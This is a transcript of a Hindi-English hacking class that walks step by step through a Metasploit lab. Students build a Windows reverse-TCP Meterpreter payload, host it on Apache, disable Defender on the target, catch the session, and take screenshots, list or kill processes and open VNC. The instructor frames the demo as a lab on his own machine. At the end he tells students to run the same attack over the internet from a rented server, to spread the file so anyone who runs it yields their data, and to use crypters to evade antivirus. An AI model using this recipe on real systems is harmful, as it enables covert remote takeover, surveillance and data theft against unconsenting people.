ओके, तो सबसे पहले हम लोगों ने लास्ट क्लास में क्या कवर किया था, उसके बारे में थोड़ा मुझे बताइए। यस, सो आज हम लोग सिस्टम हैकिंग का प्रैक्टिकल करेंगे जो कि पेंडिंग था। ओके, सो ओके, टूल्स का जिसको जिसको इशू है आप लोग को वेबसाइट से ट्राई करना है, सॉरी लैपटॉप और डेस्कटॉप से ट्राई करना है। ओके, क्योंकि सारे लोग टूल्स डाउनलोड कर चुके हैं, जिन जिनको प्रॉब्लम हो रहा है उनको लैपटॉप और डेस्कटॉप से ट्राई करना है, बिकॉज अगर आपको कोई इशू है तो आपके साइड से कोई फॉल्ट है। टूल्स को अनजिप करने के लिए आपको जिप ओपनर का यूज़ करना है। ट्राई टू सॉर्ट दिस आउट। ओके, बिकॉज ऑलमोस्ट एवरी स्टूडेंट्स ने वो टूल्स डाउनलोड करके अनजिप भी कर लिया है। ऑलरेडी उसको हम एक डिफरेंट सर्वर पे अपलोड कर रहे हैं, देन दोबारा उस लिंक को हम शेयर करेंगे, देन उसको आप डाउनलोड करके ट्राई कर सकते हैं डिफरेंट सर्वर से। उसके लिए थोड़ा वेट करना होगा। ओके, तो सबसे पहले हम लोग, मैं आपको बताना चाहूँगा कि सिस्टम हैकिंग का जो प्रैक्टिकल है जिसमें हम लोग विंडोज़ ऑपरेटिंग सिस्टम को हैक करने का ट्राई करते हैं, वो एक ऐसा एक्टिविटी है जिसके लिए हमको परमिशन होना ज़रूरी है। ओके, तो वो परमिशन ना होने के कारण हम लोग उसको किसी भी थर्ड पार्टी या तो किसी टारगेट के ऊपर परफॉर्म नहीं कर सकते हैं। इसलिए मैंने उस चीज़ को अपने खुद के लोकल होस्ट में विंडोज़ पे मैंने उसको परफॉर्म किया है। ओके, बट थोड़ी लिमिटेशंस होने के कारण वो सेशन मैंने रिकॉर्ड किया है जिसका लैंग्वेज इंग्लिश था। ओके, बट वो टोटली प्रैक्टिकल है, तो उसमें आपको लैंग्वेज से कोई इशू नहीं होना चाहिए। स्टेप बाय स्टेप उसमें हम लोग प्रैक्टिकल किए। ओके, इट्स ओके टू एवरीवन। तो वो रिकॉर्डेड जो मैंने सिस्टम हैकिंग का किया है उसका मैं पहले आपको एक्सप्लेन कर देता हूँ स्टेप बाय स्टेप, उसके बाद मैं वो रिकॉर्डिंग चलाऊंगा, देन उसको आप पूरा देखिएगा। तो सबसे पहले अपना हम स्लाइड्स ओपन कर लेते हैं उस मॉड्यूल का, सिस्टम हैकिंग, सॉरी लैब्स। तो ये है लैब। ओके, पेज नंबर मैं आपको बताता हूँ, पेज नंबर 43, पेज नंबर 43 पे ये हम लोग का प्रैक्टिकल रहेगा, एक्सप्लॉइटिंग क्लाइंट साइड वल्नरेबिलिटीज एंड एस्टेब्लिशिंग अ वीएनसी सेशन। ओके, तो इस लैब के लिए आपको चाहिए एक कैली लिनक्स, विंडोज 10, एक ब्राउजर और एडमिन राइट्स। ठीक है, अब ये कमांड्स हैं, वैसे भी आपको मैं भी कमांड शो करूंगा, बट ये कमांड आप इस पेज से भी देख सकते हैं, पेज नंबर 44 पे यही कमांड हमको टाइप करना होता है कैली लिनक्स में। तो यहाँ पे हम लोग मेटास्प्लॉइट के हेल्प से ये कमांड्स टाइप करते हैं, जिसके हेल्प से हम एक वायरस जनरेट करते हैं, देन उस वायरस को हम अपने विक्टिम के साथ शेयर कर देते हैं, जैसे कि यहाँ पे अपाची होस्ट बना के। जैसे ही वो विक्टिम उस टूल को डाउनलोड करके रन करता है, वैसे ही हमको उसका एक्सेस यहाँ मिल जाएगा, और उसके बेसिस पे हम उसको रिमोटली कंट्रोल कर सकते हैं, स्क्रीनशॉट ले सकते हैं, वॉइस रिकॉर्ड कर सकते हैं, स्क्रीन रिकॉर्ड कर सकते हैं, कैमरा एक्सेस कर सकते हैं और रिमोट एक्सेस भी कर सकते हैं। तो ये सारी की सारी चीज़ें हम लोग सिस्टम हैकिंग में कर सकते हैं। तो 5 मिनट मेरे को दीजिए, कन्फिगर करके मैं सेशन स्टार्ट करता हूँ। सो एवरीवन काइंडली बी पेशेंट।
Okay, Arun, so we will start now. The link to the So everyone can let me know in the live chat if you are able to hear the sound or not. So everyone is able to see the screen of Kali Linux. Let me know in the live chat. Okay, great. So just give me 2 minutes, okay? Just give me 2 minutes so that I can set up the things. It's MSF Venom. Okay, MSF Venom is a command of Metasploit. -p. Okay, now -p means we need to assign this one, the type of payload we want to create. Okay, so payload will be Windows Meterpreter reverse TCP. Reverse TCP hacking we are going to do. Okay, we are going to create a tunnel network which will be based on TCP, and based on that tunnel network, we will be getting access to the particular target. So -p Windows slash meterpreter slash reverse TCP. This is the name of the payload. Okay. Now hyphen platform. Which platform we want to have based on Venom -p. So everyone, यहाँ पे मैं MSF Venom कमांड का यूज़ कर रहा हूँ. ओके, MSF Venom जो कमांड है मेटास्प्लॉइट का पार्ट है, जिसके हेल्प से हम लोग यहाँ पे वायरस जनरेट करने वाले हैं. तो इस कमांड को आप याद रखिएगा, क्योंकि यही कमांड आप एक्जैक्टली यूज़ करेंगे तो आपका वायरस जनरेट होगा, एंड देन उस वायरस को हमको शेयर करना है यूज़र के साथ. तो यहाँ पे हर एक स्टेप को ध्यान से सुनिएगा. ओके, Windows meterpreter reverse TCP platform. It's Windows -A 86 architect -F the exe extension. Lhost we need to do we need to provide our IP address. So for that, let us find out the IP address.
Okay, so our IP address is this is our IP address. You need to provide our IP address here. Then L port 444 hyphen output, where we want the output to be stored. So let us store in the root. Stop. The name will be test. .exe. And now, before running the command, you need to make sure that sudo is attached in the beginning, or else it won't work. Sudo. Now, the entire command is ready. Now we need to run this command. Before that, let us move back to our PDF. Does L port varies every time like different systems? No, L port is same for every condition. It's 444. Okay, L port is same because we are doing the TCP reverse connection here. Okay, so the TCP connection only establish a secure tunnel over 444 port. P is parameter. No, P is not parameter. P means payload. The payload we are here we are using is Windows Interpreter Reverse TCP. This is the name of the payload. How do we find out the port? I'm continuously telling this from last 15 minutes that port number is 444. You don't need to find any port number. Why are not focusing on class? Port number doesn't change. Port number is static every time. 444. The IP address is the IP address will be different. Okay. The IP address is the IP address of your system. Of your system means the Kali Linux or whatever system you're going to perform the practicals. From wherever you are going to use a MSF Venom, for that system you need the IP address because a particular system will be creating the tunnel connection. Okay. Now let's go back to our this one. Okay. Okay. Location we are giving wrong. What type of location do we need to provide?
Okay, so you can see here our payload is now our virus is now generated. Okay, desktop, it's on desktop. Let us minimize this one. So here is our virus, test.exe. Now the second step is to share this file to our Windows target. How we will be doing this activity? Anyone, if you remember whatever I told, let me know how we will be going to share this file to our target. Okay, some of you are saying through email, drive. Let me tell you all that we are sharing a virus. So virus cannot be transmitted using email or Google Drive. Okay, Google can easily detect that it's a virus. So we need to share this using a pen drive, using our own server. Okay, if you have your own server, you can do that. If you have your pen drive, you can do that, or through some different sort of methods also. Right now, we are going to create a local host, Apache server. So right now, we are going to share it through Apache server. Okay, so as I'm already having an Apache server in my laptop, okay, I just need to boot the Apache server and then just share the file. So how to do that? First of all, whatever file we have generated, text.exe, we need to move it to the Apache server folder. So Apache server folder generally resides in var www html share folder. If you don't have this folder, just use the command mkdir. Okay, mkdir var www html and share. Make this directory. Chmod will change the permission, and then chown. And in this folder, whenever we create this folder, we need to move our .exe file to this one. Okay, so we just need to use the cp command and move the test.exe to our var www html share for this one file. Okay, so the command will be cp location of our this one, and in var www html share. Here we need to share the file, and then we need to start our Apache server. Let us do this one. chmod and chown is used to change the mod of the file, readable, writable, executable. If you remember, I have told you this in the beginning of the course actually. What is the use of chmod and chown? So just try to focus on each and every class, as these are the common terms which I already told in the previous classes. Now we have the exe file. Now we need to move this file to our Apache server root folder. Okay, so sudo cp home desktop test.exe. We need to move this to var www html share. Okay, now it's moved to the particular folder. Now we need to start our Apache server. Service Apache to start. Okay, sorry, sudo service Apache to start. The service is started. Okay,
Now, what is the IP address of our system? What was that? What sudo means? Sudo is a command which is used to perform actions forcefully. Okay, well, I'm not the root user of Kali Linux. That's why every time when I need to perform something which needs admin privileges, we need to use sudo commands. Okay, suppose you are using a command and you are not able to use the command. Okay, so in that case you need to use sudo. Sudo means to perform this action forcefully, so anyhow it will execute. Apache server is available in Kali Linux, or we need to install? Apache server is available by default in Kali Linux. You don't need to do anything. Just create directory where www html share using mkdir command, and just use this command service Apache to start. It will automatically start. And now let us find what is the IP address. Okay, again let us check out our IP address. What was that? 192.168. Yes, it's compulsory to run Apache server in Kali Linux. Okay, so let us go to our IP address 192.168. Okay, this one is the IP address. The Apache server is running. Okay, this one is the Apache server of Kali Linux. Now let us browse the file where it was. So test.exe, I think. Okay, sorry. First of all, okay, the Apache server is currently running. Okay, as we can see, Apache server is running. So the software is ready, the virus is ready, and the Apache server is ready. Now the second step we need to do is we need to start the poisoning. Starting the poisoning means we need to start our MSF console where we need to execute our payload. Without that, we cannot establish connection. We can download the software, but it won't work. Okay, we will not receive any connection. So in that case, we need to start our MSF console. So MSF console is the command. Let me write it down in my notepad. MSF console. So MSF console we will be using. After MSF console, use this command. Use multi-handler. Multi-handler is a type of connection which we will be creating. Use multi-handler. After multi-handler, we need to set our payload. Okay, the payload we have created a software test.exe. Now we need to execute or set the payload. Whenever it is active, we can start our exploit. So set payload. The name of the payload, Windows Interpreter reverse TCP. This is the payload. We will be executing it. Then we will be setting the lhost. The lhost of our Kali Linux. Set lport 444. It will configure, and then after that we need to type start the exploit. So after typing the exploit will start. Okay. Now let us move back to our Kali Linux. So let us close this one. Okay, clear out these all things. Sudo meta exploit. Sorry, what was it? MSF console.
So you all can see it's starting now. Okay, now the MSF console is started. Okay, now what we need to do is we need to use multi handler. After that, we need to set the payload. Set payload Windows interpreter reverse TCP. Hit enter. Set lhost. What was the IP address? 192.168. 139.131. Sorry, 139.131. Set L port 444 and then exploit. So the TCP handler started on the following IP address. Now, right now we are not receiving any logs, which means there is no connection going on. So our victim is not currently having the software installed in his system. Now, let us go back to our Windows operating system and install the software. So go to this share folder. We have this test.exe installed here. Sorry, either present here. Click on this. It will download. And then you can see your antivirus detected that it's a virus. Now let us deactivate our Windows Defender. So here we have disabled our antivirus. Now let us again download this. Now it's downloaded. Okay. Now click on the software. Okay. Let us see here if is there anything. No, we have not received anything till now here. Okay. Whenever we install the software, it will start receiving the connection. Okay. Let us minimize this. More info. Run anyway. Now it's running in the background, and you can see we started receiving the connection here. Started reverse TCP handler on this one, sending stage this one is the IP address, interpreter session 1 open, and currently we are active with the Windows operating system. The IP address 192.168.139.1 is the IP address of our Windows operating system. Now we have the access of Windows operating system. Now we can do anything in this interpreter connection. We can even take screenshots. We can even control the system remotely. We can see the tasks going on the current Windows operating system. Let us go back to our this one module. After having the connection,
Okay. Now let us first of all find out the type system info. So for that we can type sys info. So we can see the system we are currently connected to is laptop. This one Windows 10 operating system, architecture 64, language, work group, logged on users 2, meter to meter connection going on. So we can see the system info. Now let us do some different things. Now we will be creating a VNC session to capture the access of Windows 10. Okay, so we will be run VNC. Okay, so this type of thing is happening because we are using virtual machine. That's why we are getting the image of our this thing virtual machine one by one. Okay, let us terminate this one. You are able to see this one, everyone? Is it this one is visible? So the remote connection is connected. Why it's showing like this? Because we are currently using VMware and it's showing VMware under VMware under VMware under VMware. That's why it's happening like this. If you're using some different system, it won't work like this one. Okay. Let's first of all close the connection, or else it will. Okay. Now it's closed. Let us try to do some screen. This one screenshots. Okay, before screenshot, let us do this one. PS, processes running. So we can see here, these are the processes running in the laptop. Runtime broker, these are the processes currently running in my laptop, Windows, Chrome. Okay. These are the processes running in our target system. So PS is used for this one. Now let us find out the screenshot command. Screenshot. Let us store this one in home. Gosh, desktop. Screenshot saved. Let us find out the screenshot. It's saved here. It's open here. Okay, so here is the screenshot. This one is a screenshot we have taken. Okay, so close this one.
Could we stop one of those processes? Yes, we can stop any process. We just need to type stop and the process ID. This is a process ID. Okay. I hope this is a process ID. Just a second. Sorry. Yeah, this is the process ID. So you just need to pass this process ID following stop. It will stop the process ID. Stop PID, PID number, and it will stop the process. I hope it's clear to everyone. Any confusions here? Everyone? Extract all images. I'm not getting your point. What do you mean by extracting images? All images. Please clarify this. No, you need to take screenshots one by one. It's not possible like that. You need to take screenshots one by one. Yes, you can also do the folders import also. We have different sort of commands for different sort of uses. You can even shut down the system, but we cannot perform this right now. If I shut down, my whole system will go offline and the class will end. Do you want to shut down my system? Everyone? Okay. So is there any confusion? Anyone? You can ask in the live chat. If you are having any confusion, please ask in the live chat. Today we did this practical, which was very important. Then in the next session, we will be moving to vulnerabilities, vulnerability, this one practicals and different sort of practicals also. Do we have GUI of Metasploit? Yes, we do have GUI of Metasploit, but this activity, the MSF console, MSF Venom, is only available in Kali Linux. Is this virus work for Android? No, it will not work for Android. This is a Windows payload, a Windows vulnerability we have exploited. Okay, this will not work in Android. For Android, you need to use different payload. Like after -p, whatever we passed the command is a payload. Windows, Meterpreter, reverse TCP. For Android, you need to use a different payload for Android. We are performing screenshot operation in the same way we can shut down. Yes, it's simple. Just pass the command, shut down. It will shut down. Commands are very easy. Screenshot, shutdown, PID, PS. All these commands are available over the internet. You can see. If we have to install the exe in target system, well, right now here I'm using the local area connection. If you want to do this remotely or globally, you want a VPN, a server. On the particular server, install the Kali Linux. You will be having a static IP. Okay, right now we have dynamic IP. Whenever we shut down the system and restart, the IP address will change. Okay, so if you want to do it remotely or globally, you need a VPN. Sorry, VPS, virtual private server. Okay. In that server, you need to install Kali Linux, and then you can install or work with the MSF console, MSF Venom. Just pass the IP address in lhost or your static IP address, and then you can easily perform those things. If you're using physical machine instead of VM, it's up to you. If you are having Kali Linux in your actual system, yes, you can do that. Virtual machine is just a software which we are using for running multiple operating systems in the same laptop. I cannot show you practicals on different victim computers because it's not
this one is not legal and I don't have the permissions also, so I have to show this one on my own system. ओके एवरीवन, सो यही तरीका था जिसके हेल्प से हम लोग सिस्टम हैकिंग परफॉर्म कर सकते हैं। तो जैसा कि आप लोगों ने देखा यहाँ पे कैसे हम लोग करते हैं, तो आप में से किसी को कोई डाउट है तो आप पूछ सकते हैं अभी लाइव चैट में, कमांड से रिलेटेड या कुछ और चीज़। तो आप लोग का ये असाइनमेंट है कि आप लोग को ये परफॉर्म करना है। ओके, तो आई होप आपके पास वर्चुअल मशीन है और आपके पास विंडोज ऑपरेटिंग सिस्टम भी है और आपके पास कैली लिनक्स भी है। एंड्रॉयड पे कैसे कर सकते हैं? एंड्रॉयड पे हम लोग मूव करेंगे जब मोबाइल एप्लीकेशन वाले टॉपिक पे, हम लोग का जो मॉड्यूल है ना मोबाइल हैकिंग का, जब उस पर मूव करेंगे तब हम लोग एंड्रॉयड का देखेंगे। अभी सिर्फ जो टॉपिक है वही हमको कवर करना है। हाँ, डेटा एक्सट्रैक्ट कर सकते हैं, कुछ भी कर सकते हैं। अब तो आपके कंट्रोल में सिस्टम आ गया। विक्टिम जो अभी हम लोगों ने स्टेप किया लोकल होस्ट में, वही आपको करना है ग्लोबल में। आपको खुद का सर्वर लेना पड़ेगा, बस एक यही चीज़ है। खुद का आपका सर्वर होना चाहिए, खुद का आपका आईपी एड्रेस होना चाहिए। बस अपने सर्वर पे इस सेम प्रोसेस को फॉलो कीजिए और जो टूल जनरेट होगा उसको कहीं भी शेयर कर दीजिए। वो कहीं से भी एक्सेस करे उसको यूज़र, आपको वहाँ पे उसका डेटा मिल जाएगा। यस, कुछ-कुछ अलग-अलग तरीके भी हैं जिसके हेल्प से वायरस को हम अनडिटेक्टेबल बना सकते हैं एंटीवायरस से, जैसे कि क्रिप्टर यूज़ करना। तो धीरे-धीरे हम जैसे ही अपने नेक्स्ट टॉपिक पे पहुँचेंगे, जैसे कि मालवेयर थ्रेट्स, तो इसमें हम देखेंगे कैसे वायरस को हम लोग क्रिप्ट कर सकते हैं और कोई भी एंटीवायरस को डिटेक्ट नहीं कर पाएगा। जिसमें बैटरी इज़ लो, डोंट वरी, हम लोग का सेशन भी फिनिश हो चुका है। तो आप लोग का यही असाइनमेंट है कि इसको जिस तरह से हम लोगों ने परफॉर्म किया लोकल होस्ट में, वैसे ही आप लोग को करना है। और कुछ दिक्कत हुआ तो आपको पॉइंट्स बना के रखना है ताकि आप नेक्स्ट क्लास में पूछ सकें मेरे से। अपाचे होने के बाद भी आप शेयर नहीं कर पा रहे हैं। आपके सिस्टम में कोई इश्यू हो सकता है, आप पेन ड्राइव से आप टेस्ट कर सकते हैं। पेन ड्राइव से वायरस को इंस्टॉल कर लीजिए विंडोज़ में विदाउट स्टैटिक आईपी। हाँ, यहाँ पे आपको स्टैटिक आईपी का ज़रूरत नहीं है। आप जब ग्लोबल होस्ट में करना चाहेंगे ग्लोबल इंटरनेट पे, तो आपको स्टैटिक आईपी चाहिए होगा, जिसके लिए आपको स्टैटिक आईपी और होस्टिंग परचेज करना होगा। अभी हम लोग के पास डायनेमिक आईपी एड्रेस है जो कि हम लोग के राउटर का है। स्टैटिक आईपी एड्रेस आप ले सकते हैं तब जब आपको ग्लोबली करना है। मतलब मान लीजिए कि आप दिल्ली में हैं और किसी को ऐसा शेयर करना है लिंक जो चेन्नई में है, तो उस केस में आपको डायनेमिक नहीं स्टैटिक आईपी चाहिए होता है। तब बात आता है कि सर्वर कैसे परचेज करें। तो सर्वर परचेज करने के लिए बहुत वेबसाइट है, godaddy.com, bigrock.com, crazydomains.com। बहुत सारे वेबसाइट है जहाँ पे डाउनलोड कर मतलब आप परचेज कर सकते हैं। बिल्कुल, वर्चुअल सर्वर परचेज करना है आपको। वर्चुअल सर्वर परचेज कीजिए, उसमें कैली लिनक्स ऑपरेटिंग सिस्टम इंस्टॉल कर लीजिए। टूल्स का मैंने बता दिया आपको कि दूसरे सर्वर पे अपलोड कर रहे हैं हम, वहाँ से आप ट्राई कर सकते हैं। जैसे ही दूसरे सर्वर अपलोड हो जाएगा, वहाँ पे मैं आपको से लिंक जो है शेयर कर दूंगा दोबारा, क्योंकि बहुत से लोगों का गूगल ड्राइव से डाउनलोड हो चुका है, बहुत से लोग का नहीं हुआ है। तो जिन लोगों को नहीं हुआ है वो लोग कर सकते हैं। नहीं, ये जो सिस्टम हैकिंग का है ये वाला हिंदी में नहीं था वीडियो, ओके। बट इसमें कुछ नहीं है, आपको बस कमांड्स फॉलो करना है, स्टेप्स फॉलो करना है, आप इजीली कर सकते हैं इसको, सो डोंट वरी। जिन लोग का अनजिप नहीं हो रहा है, मैं इस प्रॉब्लम को देखता हूँ क्यों हो रहा है, बिकॉज मेरे सिस्टम में मैंने अनजिप किया वो हो गया, और बहुत सारे यूजर्स जो अनजिप कर रहे हैं वो हो जा रहा है, बट आपको क्यों नहीं हो रहा वो मेरे को चेक करना होगा। जो जो डाउट्स जो जो इश्यूज हो रहे हैं टूल्स में, आप लोग सही कर रहे हैं यहाँ बता के, बट मेरे को कुछ समय चाहिए होता है उसको फिक्स करने में, सो काइंडली बी पेशेंस। आपने मुझे उस इशू को बता दिया, अब मैं उसको फिक्स करूंगा। जैसे ही फिक्स होगा पहले आप ही को मैं इन्फॉर्म करूंगा ग्रुप में, ओके। सो लेट मी सी क्या इशू है वो।
हाँ, क्लास आपका सेम टाइम पे अब डेली बेसिस पे होगा, 2 to 3। ओके एवरीवन, तो इसका रिकॉर्डिंग मैं अपलोड कर देता हूँ। आप 1 घंटे में आपको दिखने लग जाएगा ड्राइव पे रिकॉर्डिंग। तो आज के लिए इतना ही, आप क्लास को लीव कर सकते हैं और असाइनमेंट जो मैंने बताया आपको सबको ज़रूर करना है। सेम स्टेप्स फॉलो करके अपने सिस्टम में आप टेस्ट कीजिए। नहीं, टाइमिंग शिफ्ट नहीं हो सकता, टाइमिंग 2 बजे ही रहेगा। ओके, थैंक यू एवरीवन, आप क्लास को लीव कर सकते हैं। थैंक यू फॉर पेशेंस, हैव अ ग्रेट डे, बाय बाय एवरीवन।